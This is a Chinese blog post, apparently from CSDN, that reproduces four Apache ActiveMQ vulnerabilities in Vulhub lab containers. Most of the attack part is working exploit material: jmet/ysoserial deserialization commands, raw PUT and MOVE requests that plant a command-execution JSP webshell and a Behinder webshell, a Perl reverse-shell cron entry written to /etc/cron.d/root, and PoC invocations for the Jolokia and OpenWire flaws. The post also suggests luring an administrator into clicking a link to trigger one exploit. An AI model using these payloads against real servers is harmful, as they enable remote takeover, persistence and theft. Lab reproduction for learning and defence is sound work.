vulhub——ActiveMQ漏洞

最新推荐文章于 2024-05-31 09:41:56 发布
最新推荐文章于 2024-05-31 09:41:56 发布
阅读量1.1k 收藏 27
点赞数 25
分类专栏: vulhub 文章标签: activemq
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_55202378/article/details/139092709
版权

文章目录

一、CVE-2015-5254(反序列化漏洞)

影响版本:Apache ActiveMQ 5.13.0之前5.x版本。apache中间件漏洞
漏洞成因:程序没有限制可在代理中序列化的类,远程攻击者可借助特制的序列化的Java Message Service(JMS)ObjectMessage对象利用该漏洞执行任意代码。

docker-compose up -d # 启动环境

环境运行后,将监听616168161两个端口。其中61616是工作端口,消息在这个端口进行传递;8161是Web管理页面端口。访问http://127.0.0.1:8161即可看到web管理页面,不过这个漏洞理论上是不需要web的。
在这里插入图片描述
漏洞发现

  1. 构造(可以使用ysoserial)可执行命令的序列化对象
  2. 作为一个消息,发送给目标61616端口
  3. 访问web管理页面,读取消息,触发漏洞

构造可供执行的序列化对象jmetysoserial工具生成 Payload 并发送,需要选择ysoserial工具中的 gadget(例如 “ROME”)作为 Payload 的一部分,最终构造出具有特定目的的恶意数据。

给ActiveMQ添加一个事件队列

java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "touch /tmp/success" -Yp ROME 192.168.92.6 61616

在这里插入图片描述

注意:需要在jmet-0.1.0-all.jar文件所属路径下新建一个external文件夹。
在这里插入图片描述

访问http://192.168.92.6:8161/admin/browse.jsp?JMSDestination=event,用户名、密码均为admin,即可看到成功发送队列,点击该队列,即可触发命令执行

在这里插入图片描述
在这里插入图片描述

docker exec -it <container> /bin/bash # 进入容器

在这里插入图片描述

注意:通过web管理页面访问消息并触发漏洞这个过程需要管理员权限。在没有密码的情况下,我们可以诱导管理员访问我们的链接以触发,或者伪装成其他合法服务需要的消息,等待客户端访问的时候触发。

二、CVE-2016-3088(任意文件写入漏洞)

ActiveMQ的web控制台分三个应用:adminapifileserver,其中admin是管理员页面,api是接口,fileserver是储存文件的接口;admin和api都需要登录后才能使用,fileserver无需登录

fileserver是一个RESTful API接口,我们可以通过GET、PUT、DELETE等HTTP请求对其中存储的文件进行读写操作,其设计目的是为了弥补消息队列操作不能传输、存储二进制文件的缺陷,但后来发现:

  • 其使用率并不高
  • 文件操作容易出现漏洞

版本要求:ActiveMQ在5.12.x~5.13.x版本中,已经默认关闭了fileserver这个应用(你可以在conf/jetty.xml中开启之);在5.14.0版本以后,彻底删除了fileserver应用。

2.1 漏洞原理

本漏洞出现在fileserver应用中,漏洞原理其实非常简单,就是**fileserver支持写入文件(但不解析jsp),同时支持移动文件(MOVE请求)**。所以,只需要写入一个文件,然后使用MOVE请求将其移动到任意位置,造成任意文件写入漏洞。文件写入有几种利用方法:

  • 写入webshell
  • 写入cron或ssh key等文件
  • 写入jar或jetty.xml等库和配置文件
  • 写入webshell的好处是,门槛低更方便,但前面也说了fileserver不解析jsp,admin和api两个应用都需要登录才能访问,所以有点鸡肋;
  • 写入cron或ssh key,好处是直接反弹拿shell,也比较方便,缺点是需要root权限;
  • 写入jar,稍微麻烦点(需要jar的后门),写入xml配置文件,这个方法比较靠谱,但有个鸡肋点是:我们需要知道activemq的绝对路径。

2.2 写入webshell

写入webshell,需要写在admin或api应用中,而这俩应用都需要登录才能访问。默认的ActiveMQ账号密码均为admin,首先访问http://192.168.92.6:8161/admin/test/systemProperties.jsp,查看ActiveMQ的绝对路径:
在这里插入图片描述
使用哥斯拉生成大马,并上传

PUT /fileserver/1.txt HTTP/1.1
Host: 192.168.92.6:8161
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Length: 120976

<%@ page import="java.io.*"%>
<%
 out.print("Hello</br>");
 String strcmd=request.getParameter("cmd");
 String line=null;
 Process p=Runtime.getRuntime().exec(strcmd);
 BufferedReader br=new BufferedReader(new InputStreamReader(p.getInputStream()));
 while((line=br.readLine())!=null){
 out.print(line+"</br>");
 }
%>

在这里插入图片描述
移动到web目录下的api文件夹(/opt/activemq/webapps/api/s.jsp)中:

MOVE /fileserver/1.txt HTTP/1.1
Destination: file:///opt/activemq/webapps/api/s1.jsp
Host: 192.168.92.6:8161
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Length: 0

在这里插入图片描述
访问http://192.168.92.6:8161/api/,查看是否存在脚本文件。
在这里插入图片描述

  • s.jsp为哥斯拉生成的jsp木马,密码默认;
  • s1.jsp为常规jsp木马
<%@ page import="java.io.*"%>
<%
out.print("Hello</br>");
String strcmd=request.getParameter("cmd");
String line=null;
Process p=Runtime.getRuntime().exec(strcmd);
BufferedReader br=new BufferedReader(new InputStreamReader(p.getInputStream()));
while((line=br.readLine())!=null){
out.print(line+"</br>");
}
%>

直接使用cmd传参即可
在这里插入图片描述

  • s2.jsp为冰蝎木马
<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%>
<%!class U extends ClassLoader{
   U(ClassLoader c){
       super(c);
   }

  public Class g(byte []b){
       return super.defineClass(b,0,b.length);
   }
}%>
<%if (request.getMethod().equals("POST"))
{
   String k="e45e329feb5d925b";/*该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond*/
   session.putValue("u",k);
   Cipher c=Cipher.getInstance("AES");
   c.init(2,new SecretKeySpec(k.getBytes(),"AES"));
   new U(this.getClass().getClassLoader()).g(c.doFinal(new >sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(page>Context);
}%>

在这里插入图片描述

2.3 写入crontab

首先上传cron配置文件(注意,换行一定要\n,不能是\r\n,否则crontab执行会失败)。

PUT /fileserver/1.txt HTTP/1.1
Host: 192.168.92.6:8161
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Length: 248

*/1 * * * * root /usr/bin/perl -e 'use Socket;$i="192.168.92.6";$p=444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

在这里插入图片描述

MOVE /fileserver/1.txt HTTP/1.1
Destination: file:///etc/cron.d/root
Host: localhost:8161
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Length: 0

在这里插入图片描述
成功获取shell。
在这里插入图片描述

这个方法需要ActiveMQ是root运行,否则也不能写入cron文件。

三、CVE-2022-41678(远程代码执行漏洞)

ActiveMQ后台存在Jolokia代码执行漏洞,在ActiveMQ中,经过身份验证的远程攻击者下可通过/api/jolokia/接口操作MBean,成功利用此漏洞可导致远程代码执行。
影响版本Apache ActiveMQ < 5.16.65.17.0< Apache ActiveMQ < 5.17.4
访问192.168.92.6:8161,用户名和密码均为admin。访问http://192.168.92.6:8161/api/jolokia/list,需要发送上面的数据包:

GET /api/jolokia/list HTTP/1.1
Host: 192.168.92.6:8161
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Authorization: Basic YWRtaW46YWRtaW4=
Connection: close
Upgrade-Insecure-Requests: 1
Priority: u=1

在这里插入图片描述

方法一

第一个方法是使用org.apache.logging.log4j.core.jmx.LoggerContextAdminMBean,这是由Log4j2提供的一个MBean(就是一个java接口)。攻击者使用这个MBean中的setConfigText操作可以更改Log4j的配置,进而将日志文件写入任意目录中。使用poc脚本来复现完整的过程:

python poc.py -u admin -p admin http://192.168.92.6:8161

在这里插入图片描述
在这里插入图片描述

这个方法受到ActiveMQ版本的限制,因为Log4j2是在5.17.0中才引入Apache ActiveMQ

方法2

第二个可利用的Mbean是jdk.management.jfr.FlightRecorderMXBean。FlightRecorder是在OpenJDK 11中引入的特性,被用于记录Java虚拟机的运行事件。利用这个功能,攻击者可以将事件日志写入任意文件。使用poc脚本来复现完整的过程(使用–exploit参数指定使用的方法):

python poc.py -u admin -p admin --exploit jfr http://192.168.92.6:8161

在这里插入图片描述
在这里插入图片描述

四、CVE-2023-46604(反序列化命令执行漏洞)

漏洞原理
允许具有代理网络访问权限的远程攻击者“通过操纵OpenWire协议中的序列化类类型来运行任意shell命令,从而使代理实例化类路径上的任何类”,问题的根本原因是不安全的反序列化。
影响版本

Apache ActiveMQ 5.18.0 < 5.18.3
Apache ActiveMQ 5.17.0 < 5.17.6
Apache ActiveMQ 5.16.0 < 5.16.7
Apache ActiveMQ < 5.15.16
Apache ActiveMQ Legacy OpenWire Module 5.18.0 < 5.18.3
Apache ActiveMQ Legacy OpenWire Module 5.17.0 < 5.17.6
Apache ActiveMQ Legacy OpenWire Module 5.16.0 < 5.16.7
Apache ActiveMQ Legacy OpenWire Module 5.8.0 < 5.15.16

ActiveMQ运行后,默认监听如下两个端口:

  • 8161 web:需配置才可远程访问;
  • 61616 tcp:远程访问。

反序列化漏洞出现在61616端口中。
访问192.168.92.6:8161,用户名、密码仍然为admin,说明服务已开启。
在这里插入图片描述
建立http服务,并且包含poc.html

python -m http.server 8888

在这里插入图片描述
执行poc.py,传入的三个参数分别是目标服务器地址、端口,以及包含poc.xml的反连平台URL:

python poc.py 192.168.92.6 61616 http://192.168.92.6:8888/poc.xml

在这里插入图片描述
进入容器,查看文件是否创建成功:

docker exec <容器名称> ls -l /tmp

在这里插入图片描述

PT_silver
关注
  • 25
    点赞
  • 27
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ActiveMQ——Java连接ActiveMQ
02-24
发布/订阅消息传递域的特点如下:(1)生产者将消息发布到topic中,每个消息可以有多个消费者,属于1:N关系(2)生产者和...启动ActiveMQ之后访问http://localhost:8161/admin/topics.jsp,此时的Topic中什么也没有先
ActiveMQ——Broker
01-27
ActiveMQ 是一个开源的消息中间件,它遵循开放标准,如 JMS(Java Message Service),用于在分布式系统中传输数据。Broker 在 ActiveMQ 中扮演着核心角色,它是整个消息传递基础设施的核心组件。 **Broker 的概念...
OpenSSH 安全漏洞(CVE-2023-51385) 升级v9(1),2024年最新网络安全面试基础知识
芯_v_648374雨馨博客
04-18 466
检查相应配置文件后,还原备份文件(可选)
Weblogic反序列化漏洞原理分析及漏洞复现(CVE-2018-2628/CVE-2023-21839复现)
rumil的博客
09-19 7514
WebLogic 存在远程代码执行漏洞CVE-2023-21839/CNVD-2023-04389),由于Weblogic IIOP/T3协议存在缺陷,当IIOP/T3协议开启时,允许未经身份验证的攻击者通过IIOP/T3协议网络访问攻击存在安全风险的WebLogic Server,漏洞利用成功WebLogic Server可能被攻击者接管执行任意命令导致服务器沦陷或者造成严重的敏感数据泄露。远程方法调用,除了该对象本身的虚拟机,其它的虚拟机也可以调用该对象的方法。
CVE-2023-36025 Windows SmartScreen 安全功能绕过漏洞
最新发布
cc123489ll的博客
05-31 755
CVE-2023-36025是微软于11月补丁日发布的安全更新中修复WindowsSmartScreen安全功能绕过漏洞。攻击者可以通过诱导用户单击特制的URL来利用该漏洞,对目标系统进行攻击。成功利用该漏洞的攻击者能够绕过WindowsDefender SmartScreen检查及其相关提示。该漏洞的攻击复杂性较低,可创建并诱导用户点击恶意设计的 Internet 快捷方式文件(.URL) 或指向此类文件的超链接来利用该漏洞,无需特殊权限即可通过互联网进行利用。
CVE-2023-46604复现学习
shierbai的博客
05-19 642
Apache ActiveMQ是一个开源的、功能强大的消息代理(Message Broker),由 Apache Software Foundation 所提供。ActiveMQ 支持 Java Message Service(JMS)1.1 和 2.0规范,提供了一个高性能、简单、灵活和支持多种语言(Java, C, C++, Ruby, Python, Perl等)的消息队列系统。OpenWire协议在ActiveMQ中被用于多语言客户端与服务端通信。
探索安全漏洞CVE-2023-24055:KeePass 2.5x的预防与应对策略
gitblog_00037的博客
05-25 556
探索安全漏洞CVE-2023-24055:KeePass 2.5x的预防与应对策略 项目地址:https://gitcode.com/alt3kx/CVE-2023-24055_PoC 一、项目介绍 随着密码管理的重要性日益凸显,KeePass因其可靠性和开源性质而备受推崇。然而,最近披露的CVE-2023-24055暴露了其2.5x版本的一个重大安全问题:恶意攻击者能够通过修改配置文件触发数据...
深入掌握JMS——ActiveMQ 十一章
12-26
深入掌握JMS——ActiveMQ 十一章pdf,收集整理
ActiveMQ——Java连接ActiveMQ(点对点)
02-24
所以消费者不会消费到已经被消费掉的消息创建Maven工程关于怎么创建Maven工程这里就不详细讲解了,不会的朋友网上找一下添加相关依赖消息生产者在运行该程序之前我们需要先启动一下ActiveMQ访问http://localhost:81
hvv 前网安人必读的漏洞清单(2024年)
2401_84466229的博客
05-28 2026
数字化浪潮席卷全球,安全漏洞的发现和利用频率正以惊人的速度上升,尤其是工业自动化、绿色能源、财经领域、交通系统、国家防务以及医疗行业等关键部门,成为了网络攻击者的主要目标。数据侵犯和勒索软件的攻击层出不穷,凸显了安全漏洞正被黑客用作主要的攻击渠道。本文梳理、分析了 2023 年危害巨大、影响范围广泛、且攻击手法多变的漏洞,旨在为网络安全界的实践者们提供一个详细的漏洞信息概览,帮助安全从业者能够更全面地掌握这些安全威胁,并据此构建更为坚固的安全防线。
Godzilla:哥斯拉
05-10
Godzilla 运行环境 JavaDynamicPayload -> jre1.0及以上 CShapDynamicPayload -> .net2.0及以上 PhpDynamicPayload -> php5.0及以上 简介 Payload以及加密器支持 哥斯拉内置了3种Payload以及6种加密器,6种支持脚本后缀,20个内置插件 JavaDynamicPayload JAVA_AES_BASE64 jsp jspx JAVA_AES_RAW jsp jspx CShapDynamicPayload CSHAP_AES_BASE64 aspx asmx ashx JAVA_AES_RAW aspx asmx ashx PhpDynamicPayload PHP_XOR_BASE64 php PHP_XOR_RAW php Raw or Base64 加密器区别 Raw : Raw是将加
探秘网络安全新星:CVE-2023-4863/CVE-2023-41064 PoC 工具
gitblog_00100的博客
05-25 469
探秘网络安全新星:CVE-2023-4863/CVE-2023-41064 PoC 工具 项目地址:https://gitcode.com/mistymntncop/CVE-2023-4863 在这个数字化的时代,网络安全的重要性不言而喻。为了保障网络的健康和安全,开发者们不断挑战新的漏洞,寻找解决方案。今天,我们将向您推荐一个专注于CVE-2023-4863漏洞的Proof-of-Concept...
探索Confluence安全漏洞利用:ConfluenceMemshell详解
gitblog_00017的博客
05-31 614
探索Confluence安全漏洞利用:ConfluenceMemshell详解 项目地址:https://gitcode.com/Lotus6/ConfluenceMemshell 1、项目介绍 ConfluenceMemshell 是一个针对Confluence服务器的漏洞利用工具,设计用于利用CVE-2021-26084、CVE-2022-26134以及最新的CVE-2023系列漏洞。这个开源...
如何看待mybatis-plus这个cve漏洞及声明
怀揣梦想,一颗执着于技术的心从未磨灭,内心住着一颗顽强的小强时刻提醒自己层层突破自我,同时也成就他人
05-31 1003
该组件在3.5.3.1及之前版本中,由于TenantHandler#getTenantId方法在构造SQL表达式时未对tenant(租户)ID值进行过滤,当程序启用了TenantPlugin并且tenant ID可由外部用户控制时,攻击者可以利用此漏洞进行SQL注入,接管程序的数据库或发送恶意命令。MyBatis-Plus的CVE漏洞是一个严重的问题,但通过及时升级版本、过滤输入和遵循最佳实践等措施,开发者可以有效地降低安全风险并保护系统的安全性。
20232906 2023-2024-2 《网络与系统攻防技术》第十一次作业
mar-velous的博客
05-27 1190
Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。当H.D. Moore在2003年发布Metasploit时,计算机安全状况也被永久性地改变了。仿佛一夜之间,任何人都可以成为黑客,每个人都可以使用攻击工具来攻击那些未打过补丁或者刚刚打过补丁的漏洞。软件厂商再也不能推迟发布针对已公布漏洞的补丁了,这是因为Metasploit团队一直都在努力开发各种攻击工具,并将它们贡献给所有Metasploit用户。
GitLab 高危漏洞可导致账号遭接管
smellycat000的专栏
05-24 250
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士GitLab 修复了一个高危漏洞,它可导致未认证攻击者在跨站点脚本攻击中接管用户账户。该漏洞的编号是CVE-2024-4835,是位于VS 代码编辑器 (Web IDE)中的一个XSS弱点,可导致威胁行动者使用恶意构造的页面窃取受限制的信息。虽然攻击者可在无需认证的攻击中利用该漏洞,但仍然需要用户交互,因此增加了攻击的复杂性。GitLab 指出,...
Ivanti 修复Endpoint Manager 中的严重RCE漏洞
smellycat000的专栏
05-24 277
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士本周二,Ivanti 公司修复了位于 Endpoint Manager (EPM) 中的多个严重漏洞,在某些情况下可用于实现远程代码执行。Ivanti 本次共修复10个漏洞,其中6个即编号为从CVE-2024-29822到CVE-2024-29827(CVSS评分9.6)的漏洞与SQL注入有关,可导致位于同一个网络中的未认证攻击者执行任意代码。余...
OSCS开源安全周报第 56 期:Apache Airflow Spark Provider 任意文件读取漏洞
cc123489ll的博客
05-23 1199
OSCS 社区共收录安全漏洞 3 个,公开漏洞值得关注的是 Apache NiFi 连接 URL验证绕过漏洞(CVE-2023-40037)、PowerJob 未授权访问漏洞(CVE-2023-36106)、Apache Airflow SparkProvider 任意文件读取漏洞(CVE-2023-40272)。针对 NPM 、PyPI 仓库,共监测到 81 个不同版本的毒组件,其中 NPM 组件包 mall-front-babel-directive。
activemq topic cpu高_Java学习之——ActiveMQ
05-23
如果你在使用 ActiveMQ 的时候发现 CPU 占用率过高,那么可能是以下原因导致的: 1. 消息消费者数量过多,导致消息处理的压力过大,从而导致 CPU 占用率升高。 2. 消息生产者发送速度过快,导致消息堆积,从而导致 CPU 占用率升高。 3. 消息队列中存在大量的未消费消息,导致消费者在处理消息时需要大量的 CPU 资源,从而导致 CPU 占用率升高。 4. ActiveMQ 配置不合理,例如使用不合适的线程池配置,导致消息处理效率低下,从而导致 CPU 占用率升高。 针对这些问题,可以采取以下措施: 1. 控制消息消费者的数量,避免消费者数量过多导致的 CPU 占用率升高。 2. 控制消息生产者的发送速度,避免消息堆积导致的 CPU 占用率升高。 3. 定期清理消息队列中的未消费消息,避免消费者在处理消息时需要大量的 CPU 资源。 4. 合理配置 ActiveMQ,例如调整线程池配置等,提高消息处理效率,降低 CPU 占用率。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值